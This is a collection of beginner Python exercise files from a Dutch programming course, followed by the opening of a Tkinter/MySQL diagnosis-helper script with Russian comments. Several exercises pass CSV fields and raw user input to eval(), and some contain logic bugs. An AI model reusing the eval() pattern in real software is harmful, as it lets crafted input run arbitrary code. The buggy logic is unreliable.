"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "import datetime\nfrom csv import writer\nvandaag = datetime.datetime.today()\ns = vandaag.strftime(\"%a %d %b %Y, %I:%m, \")\nfp = open(\"inloggers.csv\", \"w\", newline='')\n\ndef inloggen():\n achternaam = input(\"Wat is je achternaam? \")\n voornaam = input(\"Wat zijn je voorletters? \")\n gbdatum = input(\"Wat is je geboortedatum? \")\n email = input(\"Wat is je e-mail adres? \")\n csvwriter = writer(fp)\n while achternaam != 'einde':\n csvwriter.writerow([str(s), str(achternaam), str(voornaam), str(gbdatum), str(email)])\n achternaam = input(\"Wat is je achternaam? \")\n voornaam = input(\"Wat zijn je voorletters? \")\n gbdatum = input(\"Wat is je geboortedatum? \")\n email = input(\"Wat is je e-mail adres? \")\n else:\n fp.close()\n\ninloggen()"
},
{
"alpha_fraction": 0.6159420013427734,
"alphanum_fraction": 0.6231883764266968,
"avg_line_length": 33.5625,
"blob_id": "a8aa6504ca534563a519f5586d70ea45a8bf7e9f",
"content_id": "28ab5dc3a90a69f2e329d75b5231e9edfb0966ad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 552,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 16,
"path": "/Les 11/programming_3_csv_files_lezen.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "hoogstegetal = 0\nnaam=''\nbehalingsdatum = ''\nwith open('gamers.csv', 'r') as csvreader:\n for regel in csvreader:\n currentline = regel.split(';')\n naamvangetal = currentline[0]\n datumbehalinggetal = currentline[1]\n getal = eval(currentline[2].strip())\n if getal > hoogstegetal:\n hoogstegetal = getal\n naam = naamvangetal\n behalingsdatum = datumbehalinggetal\ncsvreader.close()\n\nprint('De hoogste score is: ' + str(getal) + ' op ' + str(behalingsdatum) + ' behaald door ' + str(naam))"
},
{
"alpha_fraction": 0.552742600440979,
"alphanum_fraction": 0.5801687836647034,
"avg_line_length": 28.6875,
"blob_id": "71506f74f9dece62199149cabdac83a4fb5b2224",
"content_id": "3f9e18f88b09cc4f5ab88813b1a499bd67947e72",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 474,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 16,
"path": "/les 8/programming_3_lists_numbers.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "def lijst():\n invoer = \"5-9-7-1-7-8-3-2-4-8-7-9\"\n list = invoer.split(\"-\")\n list.sort()\n nieuweList = []\n totaal = 0\n for i in list:\n totaal += int(i)\n nieuweList.append(int(i))\n print(\"Gesoorteerde list: \", nieuweList)\n print(\"Het grootste getal is: \", max(list), \"Het kleinste getal is: \", min(list))\n print(\"Aantal getallen: \", len(list), \"en som van de getallen: \", totaal)\n print(\"Gemiddelde: \", totaal / len(list))\n\n\nlijst()"
},
{
"alpha_fraction": 0.5482233762741089,
"alphanum_fraction": 0.5888324975967407,
"avg_line_length": 23.625,
"blob_id": "0557f634918b44594139fa20f9a022fd4092626e",
"content_id": "d24cd41a43b2d52a9c2ba8bd8ede5016f1e5e570",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 8,
"path": "/les6/programming_5_functie_met_listparameter_en_forloop.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "import math\ndef kwadraten_som(grondgetallen):\n res = 0\n for getal in grondgetallen:\n if getal > 0:\n res = res + (getal**2)\n return res\nprint(kwadraten_som([4,5,3,-81]))\n"
},
{
"alpha_fraction": 0.5837320685386658,
"alphanum_fraction": 0.6028708219528198,
"avg_line_length": 34,
"blob_id": "215a04fbc6f73b6ac0f71b272d13c39808555045",
"content_id": "28daf3f86293b748d783c23dc467714b59d33032",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 209,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 6,
"path": "/les3/Programming_3_tuples.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "letters = ('A', 'C', 'B', 'B', 'C', 'A', 'C', 'C', 'B')\noplossing = (letters.count('A'))\noplossing2 = (letters.count('B'))\noplossing3 = (letters.count('C'))\nlist = [oplossing,oplossing2,oplossing3]\nprint(list)"
},
{
"alpha_fraction": 0.6437908411026001,
"alphanum_fraction": 0.656862735748291,
"avg_line_length": 29.700000762939453,
"blob_id": "ec70551d9c1a2051ad565f92a459a210637d8155",
"content_id": "1559862c8702fcb9739e94328c796808cb0def4a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 306,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 10,
"path": "/Les 9/programming_1_while-loop_numbers.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "invoer = int(input ('Voer een cijfer in: '))\naantal = 0\ngetallenoptelling = 0\nwhile invoer != 0:\n getallenoptelling += invoer\n aantal += 1\n invoer = int(input('Voer een cijfer in: '))\n continue\nelse:\n print(\"Er zijn\" + str(aantal) + \"getallen ingevoerd, de som is:\" + str(getallenoptelling))"
},
{
"alpha_fraction": 0.6553191542625427,
"alphanum_fraction": 0.6553191542625427,
"avg_line_length": 28.375,
"blob_id": "d5a4edd04f6367fc092ad9569b2c180712d09267",
"content_id": "45e9989684bde3f810abaac5ff642ac96981ecc9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 235,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 8,
"path": "/les4/programming_3_input_output.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "uurloon = float(input('Wat verdien je per uur? '))\ngewerkte_uren = float(input('Hoeveel uur heb je gewerkt? '))\n\nloon = (gewerkte_uren * uurloon)\n\nline = (str(gewerkte_uren)+' '+'uur werken levert'+' '+str(loon)+' '+'op')\n\nprint(line)\n"
},
{
"alpha_fraction": 0.6305343508720398,
"alphanum_fraction": 0.6442748308181763,
"avg_line_length": 42.70000076293945,
"blob_id": "48ca0e43bd55604882f3ac216662740162d522fc",
"content_id": "ca711447684ed53e108626c85d72f51726468f66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1310,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 30,
"path": "/Les 11/programming_4_csv_files_met_header.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "hoogstegetal = 0\nlaagstegetal = 1000\nduurste = ''\nlaagste = ''\ntotaal = 0\nvoorraad = 0\nwith open('producten.csv', 'r') as csvreader:\n next(csvreader)\n for regel in csvreader:\n currentline = regel.split(';')\n artikelnummer = currentline[0]\n artikelcode = currentline[1]\n naam = currentline[2]\n voorraad = eval(currentline[3])\n prijs = eval(currentline[4].strip())\n totaal += eval(currentline[3])\n uiteindelijk = 'Het totaal van alle producten is ' + str(totaal)\n if prijs > hoogstegetal:\n hoogstegetal = prijs\n duurste = 'Het duurste artikel is ' + str(naam) + ' en het kost ' + str(prijs) + ' euro' + '\\n'\n if voorraad < laagstegetal:\n laagstegetal = voorraad\n laagste = 'Er zijn slechts ' + str(laagstegetal) + ' exemplaren in voorraad van het product met het nummer ' + str(currentline[0]) + '\\n'\ncsvreader.close()\n\nprint(duurste, laagste, uiteindelijk,)\n\n#Duurste artikel naam en prijs -- if duurste getal > duurste duurste = 'Het duurste artikel is' + str(currentline[2]) + ' en het kost ' + str(currentline[4]) + ' euro'\n#kleinste vooraad nummer en artikelnummer -- if getal < laagste getal laagstegetal = getal + currentline[0]\n#tottaalvooraad aan producten -- blabla += currenline[3]"
},
{
"alpha_fraction": 0.7179487347602844,
"alphanum_fraction": 0.7207977175712585,
"avg_line_length": 26.076923370361328,
"blob_id": "4c0c3c8385f3874c54ba9bab67ba9a0b255d8dca",
"content_id": "5e8351ab5d4a10bcccaf5d7522d8d2aa5f76c0cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 351,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 13,
"path": "/Les 12/Programming_1_XML_schrijven.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "import xmltodict\n\ndef processXML(filename):\n with open(filename) as myXMLfile:\n filecontenstring = myXMLfile.read()\n xmldictonary = xmltodict.parse(filecontenstring)\n return xmldictonary\n\nnamendict = processXML('prog_xml1.xml')\nartikelen = namendict['artikelen']['artikel']\n\nfor artikel in artikelen:\n print(artikel['naam'])"
},
{
"alpha_fraction": 0.47887325286865234,
"alphanum_fraction": 0.48591548204421997,
"avg_line_length": 27.399999618530273,
"blob_id": "9a6a89333b74063949f66952bf106879780a6767",
"content_id": "0ab66d1ff7d59a11f5753a44671832b0d14e79a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 568,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 20,
"path": "/Les 9/programming_5_dict_functions.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "def namen():\n naam = input('Voer een naam in: ')\n namen = {}\n while naam != '':\n if naam in namen.keys():\n namen[naam] += 1\n else:\n namen[naam] = 1\n naam = input('Voer een naam in: ')\n\n for naam in namen.keys():\n if namen[naam] == 1:\n print('Er is ' + str(namen[naam]) + ' student met de naam ' + str(naam))\n elif namen[naam] > 1:\n print('Er zijn ' + str(namen[naam]) + ' studenten met de naam ' + str(naam))\n else:\n print('Er zijn geen studenten')\n\n\nnamen()\n"
},
{
"alpha_fraction": 0.5656565427780151,
"alphanum_fraction": 0.6565656661987305,
"avg_line_length": 19,
"blob_id": "2b1df913a475081054bf3f2a89ef38d28d1294ef",
"content_id": "00c110f9a1eb53ae85bd24a74bd030d826054b09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 99,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 5,
"path": "/les6/programming_1_functie_met_drie_parameters.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "def som(getal1,getal2,getal3):\n res = getal1 + getal2 + getal3\n return res\n\nprint(som(5,5,5))"
},
{
"alpha_fraction": 0.649289071559906,
"alphanum_fraction": 0.6729857921600342,
"avg_line_length": 29.285715103149414,
"blob_id": "def13e269e05500912536b42637dc526558c4f75",
"content_id": "524511659f14e81f896a1c7bca2a2a3ef8159266",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 211,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 7,
"path": "/les 7/programming_2_files_lezen.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "file = open(\"kaartnummers.txt\", 'r')\nfor line in file:\n currentline = line.rstrip()\n currentline2 = currentline.split(',')\n print(currentline2[1] + ' heeft kaartnummer ' + currentline2[0])\n\nfile.close()"
},
{
"alpha_fraction": 0.4751131236553192,
"alphanum_fraction": 0.5101810097694397,
"avg_line_length": 33.03845977783203,
"blob_id": "e4f15e96037293c5c018f369b91f55e3ae486044",
"content_id": "09cf76d53a4572bce294df4de6c4884ba498333c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 884,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 26,
"path": "/les 10/programming_2_random.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "import random\n\ndef monopolyworp():\n dobbel1 = random.randrange(1, 2)\n dobbel2 = random.randrange(1, 2)\n totaal = 0\n gooien = ''\n uitkomst = dobbel1 + dobbel2\n while totaal < 3:\n if dobbel1 == dobbel2 and totaal < 2:\n totaal += 1\n gooien += str(dobbel1) + '+' + str(dobbel2) + '=' + str(uitkomst) + '(dubbel)' + '\\n'\n dobbel1 = random.randrange(1, 2)\n dobbel2 = random.randrange(1, 2)\n uitkomst = dobbel1 + dobbel2\n continue\n elif dobbel1 == dobbel2 and totaal == 2:\n gooien += str(dobbel1) + '+' + str(dobbel2) + '=' + str(uitkomst) + '(Je moet naar de gevangenis)' + '\\n'\n print(gooien)\n break\n else:\n gooien += str(dobbel1) + '+' + str(dobbel2) + '=' + str(uitkomst) + '\\n'\n print(gooien)\n break\n\nmonopolyworp()"
},
{
"alpha_fraction": 0.6363636255264282,
"alphanum_fraction": 0.6464646458625793,
"avg_line_length": 27.428571701049805,
"blob_id": "2893260fb0e6570d591ae9d9eef206a9de7310e4",
"content_id": "126c00a4aa28b02fb2fc0e137f643f06c2de20cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 198,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 7,
"path": "/les5/programming_2_ifwith2booleanoperators.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "leeftijd = int(input(\"Hoe oud ben je? \"))\npaspoort = input(\"Heb je een paspoort; ja/nee? \")\n\nif leeftijd > 17 and paspoort==\"ja\":\n print (\"Je mag stemmen\")\nelse:\n print (\"Je mag niet stemmen\")"
},
{
"alpha_fraction": 0.6521739363670349,
"alphanum_fraction": 0.6598465442657471,
"avg_line_length": 31.66666603088379,
"blob_id": "b64914fc6d99ed480d623d7bc75c474fc2707720",
"content_id": "4d0268339cf0315b696baa83074faabe400c1ca8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 391,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 12,
"path": "/les4/Programming_1_getallen_strings_conversion.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "cijferICOR = float(input('enter cijfer ICOR: '))\ncijferPROG = float(input('enter cijfer PROG: '))\ncijferCSN = float(input('enter cijfer CSN: '))\n\n\ngeld = (cijferPROG+ cijferPROG + cijferICOR) * 30\n\ngemiddelde = (cijferICOR + cijferPROG + cijferCSN) / 3\n\nline = ('Mijn cijfers (gemiddeld een' + \" \" + str(gemiddelde) + \" \" + 'leveren een beloning van' + \" \" + str(geld) + 'op!')\n\nprint (line)"
},
{
"alpha_fraction": 0.6684635877609253,
"alphanum_fraction": 0.6900269389152527,
"avg_line_length": 19.66666603088379,
"blob_id": "e449d89d08e51f2c5ccf27f440cc3e0776794519",
"content_id": "b042526aa30a1c46563135307d4b8627c70b9cea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 371,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 18,
"path": "/les1en2/Programming_3_Statements_4_BooleanExpressions.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "a = 6\nb = 7\nprint (a)\nprint (b)\nc = ((a+b)/2)\nprint (c)\nvoornaam = 'yasmara'\nachternaam = 'besten'\nprint (voornaam)\nprint (achternaam)\nmijnnaam = (voornaam+' '+achternaam)\nprint (mijnnaam)\n\nprint (75 > a and 75 < b)\nprint (len(mijnnaam) == len(voornaam+achternaam))\ntussenvoegsel = 'niets'\nprint (len(mijnnaam) *5 > len(tussenvoegsel))\nprint (tussenvoegsel in achternaam)"
},
{
"alpha_fraction": 0.5607235431671143,
"alphanum_fraction": 0.5633074641227722,
"avg_line_length": 22.454545974731445,
"blob_id": "5199a0e0a79a6d81c9b872a7e119735cd4c99a3c",
"content_id": "f2e12cefbc4488ad7d5ad5a3656ef7983dbb7bbe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 774,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 33,
"path": "/Les 9/programming_4_file_dict.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "def ticker(filename):\n tickers = {}\n with open(filename) as file:\n for line in file:\n currentline = line.strip()\n lst = currentline.split(':')\n k = lst[0]\n v = lst[1]\n tickers[k] = v\n return(tickers)\n\n\nticker('afkorting.txt')\n\ndef companyname():\n tickers = ticker('afkorting.txt')\n company_input = input('Enter Company name: ')\n gekregen = tickers.get(company_input, '(onbekend bedrijf)')\n print(gekregen)\n\n\ncompanyname()\n\ndef tickername():\n tickers = ticker('afkorting.txt')\n tickers_input = input('Enter Company ticker: ')\n for k,v in tickers.items():\n if tickers_input == v:\n print(k)\n else:\n print('(onbekend bedrijf)')\n\ntickername()\n"
},
{
"alpha_fraction": 0.6085526347160339,
"alphanum_fraction": 0.6151315569877625,
"avg_line_length": 32.88888931274414,
"blob_id": "92b1ebd30202d5fdff87d20144a085cffce61200",
"content_id": "e1f461f8a60185cb7414464aa37f3fc1efef5394",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 304,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 9,
"path": "/Les 9/programming_2_whileloop_strings.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "woord = input(\"Voer een woord van 4 letters in: \")\nuitvoer = ''\nwhile len(woord) != 4:\n lengte = len(woord)\n print(str(woord) + \" heeft \" + str(lengte) + \" letters\")\n woord = input(\"Voer een woord in: \")\n continue\nelse:\n print(\"Inlezen van correcte string: \" + str(woord) + \" is geslaagd\")"
},
{
"alpha_fraction": 0.5969581604003906,
"alphanum_fraction": 0.6007604598999023,
"avg_line_length": 23,
"blob_id": "569c9bd386e68988aead0265f97f357d7d078f8b",
"content_id": "6a737c1ff9b36f6adcfaccc2daf8d00abd5a0a40",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 263,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 11,
"path": "/les 10/programming_3_ascii.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "def code(invoerstring):\n invoerstrings = ''\n for i in invoerstring:\n ordening = ord(i)\n int(ordening)\n verschoven = ordening + 3\n letters = chr(verschoven)\n invoerstrings += letters\n print(invoerstrings)\n\ncode('RutteAlkmaarDen Helder')"
},
{
"alpha_fraction": 0.6074073910713196,
"alphanum_fraction": 0.6074073910713196,
"avg_line_length": 33,
"blob_id": "a94c38596f15b6871f6e8c716997875738744519",
"content_id": "a46f6a49974424f5de7bee719e32ca2e44c02c62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 135,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 4,
"path": "/les5/programming_6_for_if_vowels.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "s = \"Guido van Rossum heeft programmeertaal Python bedacht.\"\nfor klinkers in s:\n if klinkers in ['a','e','i','o','u']:\n print(klinkers)"
},
{
"alpha_fraction": 0.46724891662597656,
"alphanum_fraction": 0.528384268283844,
"avg_line_length": 22,
"blob_id": "207c3ba554216798c8c5c4c8d4ec4d3074640d19",
"content_id": "ad1e3c9a886d8b0c36a1ea68181d3dd53e995c6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 229,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 10,
"path": "/les 7/programming_1_formatting.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "def convert(celsius):\n fahrenheit = celsius * 1.8 + 32\n return fahrenheit\n\ndef table():\n print('{:2}F' '{:7}C'.format(' ',' '))\n for i in range (-30,41,10):\n print(('{:5}' '{:7}').format(convert(i),i))\n\ntable()"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5571428537368774,
"avg_line_length": 22.66666603088379,
"blob_id": "f201def90d7fb193af76d821bce8d0717283e911",
"content_id": "b8f72e4bdd5f2135836e114a00871e0307c2ecd3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 70,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 3,
"path": "/les5/programming_5_for_if_numbers.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "for nummer in range(0,7):\n if nummer %2 == 0:\n print(nummer)"
},
{
"alpha_fraction": 0.6306695342063904,
"alphanum_fraction": 0.6393088698387146,
"avg_line_length": 24.72222137451172,
"blob_id": "2c89a05bbb07d3cf652bb073be8472c78df82f1a",
"content_id": "7dc07d98bf60479d716052dec3661f12dde9b93a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 463,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 18,
"path": "/Les 11/programming_1_catching_exceptions.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "prijs=4356\ndef errorexcept():\n try:\n mensen = int(input('hoeveel mensen gaan er mee? '))\n antwoord= prijs / mensen\n\n print(antwoord)\n except ImportError:\n print('Negatieve getallen zijn niet toegestaan!')\n except ValueError:\n print('Gebruik cijfers voor het invoeren van het aantal!')\n except ZeroDivisionError:\n print(\"Delen door nul kan niet!\")\n except:\n print('Onjuiste invoer!')\n\n\nerrorexcept()\n"
},
{
"alpha_fraction": 0.6286919713020325,
"alphanum_fraction": 0.6329113841056824,
"avg_line_length": 22.799999237060547,
"blob_id": "5ed56260a602e2ea8cb6b97006b4540020a298b2",
"content_id": "26389f1531b920c6e4a3ef9987990f3b022ac8d9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 237,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 10,
"path": "/les 7/programming_5_string_functions.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "zin = input('Voer hier een willekeurige zin in: ')\n\ndef gemiddelde():\n total = 0\n currentline = zin.split(\" \")\n for i in currentline:\n total += len(i)\n return float(total) / float(len(currentline))\n\nprint(gemiddelde())"
},
{
"alpha_fraction": 0.5977011322975159,
"alphanum_fraction": 0.6283524632453918,
"avg_line_length": 28.11111068725586,
"blob_id": "14863fa110c53f8aefe294e6d24afa63a67318fb",
"content_id": "fa96db32a6bfd757ce4a60f7f79f9020f3ab0acb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 261,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 9,
"path": "/les6/programming_3_functie_met_if.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "lengte1 = float(input(\"Hoe lang ben je?(antwoord met bijv. 1.10): \"))\n\ndef lang_genoeg(lengte):\n if lengte1 > (lengte):\n print (\"Je bent lang genoeg voor deze attractie!\")\n else:\n print (\"Sorry, je bent te klein!\")\n\nlang_genoeg (float(1.20))"
},
{
"alpha_fraction": 0.5572916865348816,
"alphanum_fraction": 0.5729166865348816,
"avg_line_length": 23.125,
"blob_id": "685ff64307221d7d981da7f6612073859533e460",
"content_id": "3b93ac4c93c1833c5e79f9e999f4d3647a60ae33",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 192,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 8,
"path": "/les 8/programming_2_lists_strings.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "lijst = eval(input(\"Geef lijst met minimaal 10 strings: \"))\ntotaal = []\nfor woord in lijst:\n if len(woord) <= 4:\n totaal.append(woord)\n print(totaal)\n\n #word, end = ' '"
}
] | 43 |
Kildsforkids/prediction | https://github.com/Kildsforkids/prediction | 0be56df76fe5555e186bc4100a5cc8a636fbdeec | 98aa84e7930d696ee1447248ddebeb12a16e0b2a | c4c990e546bf0fe9ca72edc0fd80cf30a4444ec2 | refs/heads/master | 2020-04-18T22:09:41.600951 | 2019-05-15T02:41:22 | 2019-05-15T02:41:22 | 167,785,747 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5714197754859924,
"alphanum_fraction": 0.580050528049469,
"avg_line_length": 34.494529724121094,
"blob_id": "2a22db1759c2132ccb12488ed6b6ba8398f5f857",
"content_id": "87e0244a2dedfa39a0cbc32e71b8ea7ba659a055",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 19466,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 457,
"path": "/main.py",
"repo_name": "Kildsforkids/prediction",
"src_encoding": "UTF-8",
"text": "from tkinter import Tk, Frame, Listbox, Scrollbar, Toplevel, Message, \\\n StringVar, IntVar, Spinbox, Button, OptionMenu, Checkbutton\nimport json\nimport mysql.connector\nfrom mysql.connector import errorcode\nimport translations\nimport pandas as pd\n\n# !!!ОСТОРОЖНО!!! ДАЛЬШЕ ИДУТ КОСТЫЛИ |\n# V\ncount = 0\nwindow_count = 0\n# Функция соединения с БД\ndef connect(host, user, password, database, port):\n connection = None\n try:\n # Пытаемся установить соединение\n connection = mysql.connector.connect(user=user, password=password,\n host=host, database=database,\n port=port)\n except mysql.connector.Error as err:\n # Если неверны данные для подключения\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n print(\"Something is wrong with your user name or password\")\n # Если БД не существует\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n print(\"Database does not exist\")\n # Другие виды ошибок\n else:\n print(err)\n # При успешном подключении\n else:\n print(\"You are connected!\")\n # Возвращает None\n return connection\n\n\n# Функция записи в JSON-файл\ndef json_write(file, data):\n # Открываем файл на запись\n with open(file, \"w\") as write_file:\n # Записываем данные\n json.dump(data, write_file)\n # Закрываем файл\n write_file.close()\n\n\n# Функция считывания из JSON-файла\ndef json_read(file):\n # Открываем файл на чтение\n with open(file, \"r\") as read_file:\n # Считываем данные\n data = json.load(read_file)\n # Закрываем файл\n read_file.close()\n # Возвращаем данные\n return data\n\n\n# Функция записи данных из БД в JSON-файл\ndef load(connection):\n # Устанавливаем курсор для SQL-запросов\n cursor = connection.cursor()\n # Получаем результат по отправленному SQL-запросу\n cursor.execute(\"select * from directory;\")\n # Получаем список атрибутов\n atr_list = [i[0] for i in cursor.description]\n # Создаем пустой список для историй болезней\n data = []\n # Перенос записей из БД в data с непустыми атрибутами\n for row in cursor:\n # Добавляем словарь (для записи - атрибут: значение - из БД)\n data.append({})\n # Заводим индекс для перехода к атрибуту с непустым значением\n k = 0\n # Пробегаемся по столбцам и добавляеи записи в словаре -\n # атрибут: значение\n for col in row:\n # Если значение есть\n if col is not None:\n # Обнволяем пары - атрибут: значение -\n # в последнем словаре списка\n data[len(data)-1].update({atr_list[k]: col})\n # Увеличиваем индекс\n k += 1\n # Закрываем подключение к БД\n connection.close()\n # Приводим строковые значения к стандартному виду\n for history in data:\n for key in history:\n # Если не из диагноза и пола\n if key != 'diagnose' and key != 'sex':\n # Если тип значения - строка\n if type(history[key]) is str:\n # Если строка состоит только из целого числа\n if history[key].isdigit():\n # Привести строку к целому числу\n history[key] = int(history[key])\n else:\n # Привести строку к нижнему регистру, без пробелов,\n # ё = е\n history[key] = history[key].lower().replace(' ', ''). \\\n replace('ё', 'е')\n # Запись из data в JSON-файл\n json_write(\"local_db.json\", data)\n # Удаляем ненужные атрибуты из списка\n atr_list.remove('id')\n atr_list.remove('diagnose')\n # Сохраняем список атрибутов в JSON-файле\n json_write(\"attributes.json\", atr_list)\n\n\n# Функция заполнения списка словарями - {атрибут, виджет, значения}\ndef create_fields_list():\n global fields, atr_list\n\n # Список атрибутов и их возможных значений\n fields = []\n # Получаем список атрибутов\n atr_list = json_read(\"attributes.json\")\n # Получаем данные (истории болезней)\n data = json_read(\"local_db.json\")\n # Для каждого атрибута\n for atr in atr_list:\n # Создаем в списке словарь\n fields.append({})\n # Список значений (если строковые, то для выпадающего меню,\n # если числовые, то для запоминания последнего введенного значения)\n values = []\n # По умолчанию виджет - SpinBox (числовое поле)\n widget_type = 'spinbox'\n # Для каждой истории болезни\n for history in data:\n # Если есть такой атрибут\n if history.get(atr) is not None:\n # Если значение атрибута - строка\n if type(history[atr]) is str:\n # Если такой строки еще нет\n if history[atr] not in values:\n # Добавить строку в список значений\n # для выпадающего списка (OptionMenu)\n values.append(history[atr])\n # Тип виджета - OptionMenu (выпадающий список)\n widget_type = 'option'\n # Если значение атрибута - целое число\n elif type(history[atr]) is int:\n # Если атрибут - не возраст\n if atr != 'age':\n # Тип виджета - CheckButton (окно с галочкой)\n widget_type = 'checkbutton'\n break\n # Если значение атрибута - вещественное число\n elif type(history[atr]) is float:\n # Тип виджета - SpinBox\n # (числовое поле для вещественных чисел)\n widget_type = 'spinbox_float'\n break\n else:\n break\n # Записать словарь\n # {'atr': название атрибута,\n # 'widget': тип виджета,\n # 'values': значения атрибута\n # } в список словарей\n fields[len(fields)-1].update({'atr': atr})\n fields[len(fields)-1].update({'widget': widget_type})\n fields[len(fields)-1].update({'values': values})\n\n\n# Проверка на минимальное количество выбранных атрибутов для доступа к 